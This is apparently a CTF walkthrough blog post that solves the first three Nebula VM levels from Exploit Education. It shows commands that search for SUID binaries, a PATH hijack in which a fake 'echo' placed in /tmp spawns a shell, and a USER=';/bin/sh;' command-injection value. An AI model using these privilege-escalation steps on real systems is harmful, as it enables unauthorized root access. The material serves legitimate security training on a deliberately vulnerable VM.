Day 29: Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.
To follow along, get the Nebula VM from Exploit Education…
Level 00 (Set User ID)
Finding the files and ignoring errors…
find / -perm /4000 2>/dev/null
A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.
Of course “/bin/…/flag00” is seriously suspect, so we try this…
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!
Search for SUID/GUID binaries
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/nullfind / -perm -1000 -type d 2>/dev/nullfind / -perm -g=s -type f 2>/dev/null
Level 01 (Environment Variable Injection — PATH)
Challenge source is provided, can we spot the vulnerability?
We know we can alter environment variables and that the program will do the following:
setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.
With the source code, and access to the server, it’s easy to spot the issue:
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.
nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag
Level 02 (Environment Variable Injection — USER)
We get the source again for this..
This one is easy, we can just inject a command into the USER environment variable.
cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag
The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.